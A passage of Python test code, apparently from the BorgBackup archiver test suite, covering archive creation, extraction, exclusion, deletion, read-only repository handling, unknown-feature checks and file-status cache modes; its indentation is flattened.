def test_create_no_cache_sync(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
create_json = json.loads(self.cmd('create', '--no-cache-sync', self.repository_location + '::test', 'input',
'--json', '--error')) # ignore experimental warning
info_json = json.loads(self.cmd('info', self.repository_location + '::test', '--json'))
create_stats = create_json['cache']['stats']
info_stats = info_json['cache']['stats']
assert create_stats == info_stats
self.cmd('delete', '--cache-only', self.repository_location)
self.cmd('create', '--no-cache-sync', self.repository_location + '::test2', 'input')
self.cmd('info', self.repository_location)
self.cmd('check', self.repository_location)
def test_extract_pattern_opt(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file_important'])
def _assert_test_caches(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['cache2', 'file1'])
self.assert_equal(sorted(os.listdir('output/input/cache2')), [CACHE_TAG_NAME])
def test_exclude_caches(self):
self._create_test_caches()
self.cmd('create', '--exclude-caches', self.repository_location + '::test', 'input')
self._assert_test_caches()
def test_recreate_exclude_caches(self):
self._create_test_caches()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-caches', self.repository_location + '::test')
self._assert_test_caches()
def _create_test_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('tagged1/.NOBACKUP')
self.create_regular_file('tagged2/00-NOBACKUP')
self.create_regular_file('tagged3/.NOBACKUP/file2', size=1024)
def _assert_test_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
def test_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP', self.repository_location + '::test', 'input')
self._assert_test_tagged()
def test_recreate_exclude_tagged(self):
self._create_test_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP', '--exclude-if-present', '00-NOBACKUP',
self.repository_location + '::test')
self._assert_test_tagged()
def _create_test_keep_tagged(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file0', size=1024)
self.create_regular_file('tagged1/.NOBACKUP1')
self.create_regular_file('tagged1/file1', size=1024)
self.create_regular_file('tagged2/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('tagged2/file2', size=1024)
self.create_regular_file('tagged3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('tagged3/file3', size=1024)
self.create_regular_file('taggedall/.NOBACKUP1')
self.create_regular_file('taggedall/.NOBACKUP2/subfile1', size=1024)
self.create_regular_file('taggedall/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('taggedall/file4', size=1024)
def _assert_test_keep_tagged(self):
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file0', 'tagged1', 'tagged2', 'tagged3', 'taggedall'])
self.assert_equal(os.listdir('output/input/tagged1'), ['.NOBACKUP1'])
self.assert_equal(os.listdir('output/input/tagged2'), ['.NOBACKUP2'])
self.assert_equal(os.listdir('output/input/tagged3'), [CACHE_TAG_NAME])
self.assert_equal(sorted(os.listdir('output/input/taggedall')),
['.NOBACKUP1', '.NOBACKUP2', CACHE_TAG_NAME, ])
def test_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test', 'input')
self._assert_test_keep_tagged()
def test_recreate_exclude_keep_tagged(self):
self._create_test_keep_tagged()
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('recreate', '--exclude-if-present', '.NOBACKUP1', '--exclude-if-present', '.NOBACKUP2',
'--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
self._assert_test_keep_tagged()
@pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_recreate_hardlinked_tags(self): # test for issue #4911
self.cmd('init', '--encryption=none', self.repository_location)
self.create_regular_file('file1', contents=CACHE_TAG_CONTENTS) # "wrong" filename, but correct tag contents
os.mkdir(os.path.join(self.input_path, 'subdir')) # to make sure the tag is encountered *after* file1
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'subdir', CACHE_TAG_NAME)) # correct tag name, hardlink to file1
self.cmd('create', self.repository_location + '::test', 'input')
# in the "test" archive, we now have, in this order:
# - a regular file item for "file1"
# - a hardlink item for "CACHEDIR.TAG" referring back to file1 for its contents
self.cmd('recreate', '--exclude-caches', '--keep-exclude-tags', self.repository_location + '::test')
# if issue #4911 is present, the recreate will crash with a KeyError for "input/file1"
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='Linux capabilities test, requires fakeroot >= 1.20.2')
def test_extract_capabilities(self):
fchown = os.fchown
# We need to manually patch chown to get the behaviour Linux has, since fakeroot does not
# accurately model the interaction of chown(2) and Linux capabilities, i.e. it does not remove them.
def patched_fchown(fd, uid, gid):
xattr.setxattr(fd, b'security.capability', b'', follow_symlinks=False)
fchown(fd, uid, gid)
# The capability descriptor used here is valid and taken from a /usr/bin/ping
capabilities = b'\x01\x00\x00\x02\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'security.capability', capabilities)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
with patch.object(os, 'fchown', patched_fchown):
self.cmd('extract', self.repository_location + '::test')
assert xattr.getxattr(b'input/file', b'security.capability') == capabilities
@pytest.mark.skipif(not xattr.XATTR_FAKEROOT, reason='xattr not supported on this system or on this version of'
'fakeroot')
def test_extract_xattrs_errors(self):
def patched_setxattr_E2BIG(*args, **kwargs):
raise OSError(errno.E2BIG, 'E2BIG')
def patched_setxattr_ENOTSUP(*args, **kwargs):
raise OSError(errno.ENOTSUP, 'ENOTSUP')
def patched_setxattr_EACCES(*args, **kwargs):
raise OSError(errno.EACCES, 'EACCES')
self.create_regular_file('file')
xattr.setxattr(b'input/file', b'user.attribute', b'value')
self.cmd('init', self.repository_location, '-e' 'none')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
input_abspath = os.path.abspath('input/file')
with patch.object(xattr, 'setxattr', patched_setxattr_E2BIG):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: too big for this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_ENOTSUP):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: xattrs not supported on this filesystem\n' in out
os.remove(input_abspath)
with patch.object(xattr, 'setxattr', patched_setxattr_EACCES):
out = self.cmd('extract', self.repository_location + '::test', exit_code=EXIT_WARNING)
assert ': when setting extended attribute user.attribute: Permission denied\n' in out
assert os.path.isfile(input_abspath)
def test_path_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir1/dir2/file', size=1024 * 80)
with changedir('input/dir1/dir2'):
self.cmd('create', self.repository_location + '::test', '../../../input/dir1/../dir1/dir2/..')
output = self.cmd('list', self.repository_location + '::test')
self.assert_not_in('..', output)
self.assert_in(' input/dir1/dir2/file', output)
def test_exclude_normalization(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--exclude=file1', self.repository_location + '::test1', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test1')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
with changedir('input'):
self.cmd('create', '--exclude=./file1', self.repository_location + '::test2', '.')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test2')
self.assert_equal(sorted(os.listdir('output')), ['file2'])
self.cmd('create', '--exclude=input/./file1', self.repository_location + '::test3', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test3')
self.assert_equal(sorted(os.listdir('output/input')), ['file2'])
def test_repeated_files(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input')
def test_overwrite(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Overwriting regular files and directories should be supported
os.mkdir('output/input')
os.mkdir('output/input/file1')
os.mkdir('output/input/dir2')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
# But non-empty dirs should fail
os.unlink('output/input/file1')
os.mkdir('output/input/file1')
os.mkdir('output/input/file1/dir')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', exit_code=1)
def test_rename(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test', 'test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('rename', self.repository_location + '::test.2', 'test.4')
self.cmd('extract', '--dry-run', self.repository_location + '::test.3')
self.cmd('extract', '--dry-run', self.repository_location + '::test.4')
# Make sure both archives have been renamed
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 2)
self.assert_in('test.3', manifest.archives)
self.assert_in('test.4', manifest.archives)
def test_info(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = self.cmd('info', self.repository_location)
assert 'All archives:' in info_repo
info_archive = self.cmd('info', self.repository_location + '::test')
assert 'Archive name: test\n' in info_archive
info_archive = self.cmd('info', '--first', '1', self.repository_location)
assert 'Archive name: test\n' in info_archive
def test_info_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
info_repo = json.loads(self.cmd('info', '--json', self.repository_location))
repository = info_repo['repository']
assert len(repository['id']) == 64
assert 'last_modified' in repository
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert info_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in info_repo['encryption']
cache = info_repo['cache']
stats = cache['stats']
assert all(isinstance(o, int) for o in stats.values())
assert all(key in stats for key in ('total_chunks', 'total_csize', 'total_size', 'total_unique_chunks', 'unique_csize', 'unique_size'))
info_archive = json.loads(self.cmd('info', '--json', self.repository_location + '::test'))
assert info_repo['repository'] == info_archive['repository']
assert info_repo['cache'] == info_archive['cache']
archives = info_archive['archives']
assert len(archives) == 1
archive = archives[0]
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
assert datetime.strptime(archive['start'], ISO_FORMAT)
assert datetime.strptime(archive['end'], ISO_FORMAT)
def test_comment(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', '--comment', 'this is the comment', self.repository_location + '::test2', 'input')
self.cmd('create', '--comment', '"deleted" comment', self.repository_location + '::test3', 'input')
self.cmd('create', '--comment', 'preserved comment', self.repository_location + '::test4', 'input')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: this is the comment' in self.cmd('info', self.repository_location + '::test2')
self.cmd('recreate', self.repository_location + '::test1', '--comment', 'added comment')
self.cmd('recreate', self.repository_location + '::test2', '--comment', 'modified comment')
self.cmd('recreate', self.repository_location + '::test3', '--comment', '')
self.cmd('recreate', self.repository_location + '::test4', '12345')
assert 'Comment: added comment' in self.cmd('info', self.repository_location + '::test1')
assert 'Comment: modified comment' in self.cmd('info', self.repository_location + '::test2')
assert 'Comment: \n' in self.cmd('info', self.repository_location + '::test3')
assert 'Comment: preserved comment' in self.cmd('info', self.repository_location + '::test4')
def test_delete(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
self.cmd('create', self.repository_location + '::test.3', 'input')
self.cmd('create', self.repository_location + '::another_test.1', 'input')
self.cmd('create', self.repository_location + '::another_test.2', 'input')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
self.cmd('delete', '--prefix', 'another_', self.repository_location)
self.cmd('delete', '--last', '1', self.repository_location)
self.cmd('delete', self.repository_location + '::test')
self.cmd('extract', '--dry-run', self.repository_location + '::test.2')
output = self.cmd('delete', '--stats', self.repository_location + '::test.2')
self.assert_in('Deleted data:', output)
# Make sure all data except the manifest has been deleted
with Repository(self.repository_path) as repository:
self.assert_equal(len(repository), 1)
def test_delete_multiple(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', 'input')
self.cmd('create', self.repository_location + '::test2', 'input')
self.cmd('create', self.repository_location + '::test3', 'input')
self.cmd('delete', self.repository_location + '::test1', 'test2')
self.cmd('extract', '--dry-run', self.repository_location + '::test3')
self.cmd('delete', self.repository_location, 'test3')
assert not self.cmd('list', self.repository_location)
def test_delete_repo(self):
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('dir2/file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.cmd('create', self.repository_location + '::test.2', 'input')
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'no'
self.cmd('delete', self.repository_location, exit_code=2)
assert os.path.exists(self.repository_path)
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
self.cmd('delete', self.repository_location)
# Make sure the repo is gone
self.assertFalse(os.path.exists(self.repository_path))
def test_delete_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
repository.delete(item.chunks[-1].id)
break
else:
assert False # missed the file
repository.commit(compact=False)
output = self.cmd('delete', '--force', self.repository_location + '::test')
self.assert_in('deleted archive was corrupted', output)
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_delete_double_force(self):
self.cmd('init', '--encryption=none', self.repository_location)
self.create_src_archive('test')
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, 'test')
id = archive.metadata.items[0]
repository.put(id, b'corrupted items metadata stream chunk')
repository.commit(compact=False)
self.cmd('delete', '--force', '--force', self.repository_location + '::test')
self.cmd('check', '--repair', self.repository_location)
output = self.cmd('list', self.repository_location)
self.assert_not_in('test', output)
def test_corrupted_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
self.cmd('extract', '--dry-run', self.repository_location + '::test')
output = self.cmd('check', '--show-version', self.repository_location)
self.assert_in('borgbackup version', output) # implied output even without --info given
self.assert_not_in('Starting repository check', output) # --info not given for root logger
name = sorted(os.listdir(os.path.join(self.tmpdir, 'repository', 'data', '0')), reverse=True)[1]
with open(os.path.join(self.tmpdir, 'repository', 'data', '0', name), 'r+b') as fd:
fd.seek(100)
fd.write(b'XXXX')
output = self.cmd('check', '--info', self.repository_location, exit_code=1)
self.assert_in('Starting repository check', output) # --info given for root logger
def test_readonly_check(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('check', '--verify-data', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('check', '--verify-data', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('check', '--verify-data', self.repository_location, '--bypass-lock')
def test_readonly_diff(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('a')
self.create_src_archive('b')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('diff', '%s::a' % self.repository_location, 'b', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('diff', '%s::a' % self.repository_location, 'b')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('diff', '%s::a' % self.repository_location, 'b', '--bypass-lock')
def test_readonly_export_tar(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar')
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('export-tar', '%s::test' % self.repository_location, 'test.tar', '--bypass-lock')
def test_readonly_extract(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('extract', '%s::test' % self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('extract', '%s::test' % self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('extract', '%s::test' % self.repository_location, '--bypass-lock')
def test_readonly_info(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('info', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('info', self.repository_location, '--bypass-lock')
def test_readonly_list(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
self.cmd('list', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
self.cmd('list', self.repository_location)
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
self.cmd('list', self.repository_location, '--bypass-lock')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_readonly_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
with self.fuse_mount(self.repository_location, exit_code=EXIT_ERROR):
pass
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
# self.fuse_mount always assumes fork=True, so for this test we have to manually set fork=False
with self.fuse_mount(self.repository_location, fork=False):
pass
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
with self.fuse_mount(self.repository_location, None, '--bypass-lock'):
pass
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
def add_unknown_feature(self, operation):
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
manifest.write()
repository.commit(compact=False)
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# delete of an archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# delete of the whole repository ignores features
self.cmd('delete', self.repository_location)
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_unknown_feature_on_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
os.mkdir(mountpoint)
# XXX this might hang if it doesn't raise an error
self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
@pytest.mark.allow_cache_wipe
def test_unknown_mandatory_feature_in_cache(self):
if self.prefix:
path_prefix = 'ssh://__testsuite__'
else:
path_prefix = ''
print(self.cmd('init', '--encryption=repokey', self.repository_location))
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
cache.begin_txn()
cache.cache_config.mandatory_features = set(['unknown-feature'])
cache.commit()
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test', 'input')
else:
called = False
wipe_cache_safe = LocalCache.wipe_cache
def wipe_wrapper(*args):
nonlocal called
called = True
wipe_cache_safe(*args)
with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
self.cmd('create', self.repository_location + '::test', 'input')
assert called
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising, for why, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
def test_file_status_cs_cache_mode(self):
"""test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
self.create_regular_file('file1', contents=b'123')
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
# modify file1, but cheat with the mtime (and atime) and also keep same size:
st = os.stat('input/file1')
self.create_regular_file('file1', contents=b'321')
os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
# this mode uses ctime for change detection, so it should find file1 as modified
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
"""test that excluded paths are listed"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
if has_lchflags:
self.create_regular_file('file3', size=1024 * 80)
platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
# should find second file as excluded
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
self.assert_in("U input/file1", output)
self.assert_in("x input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
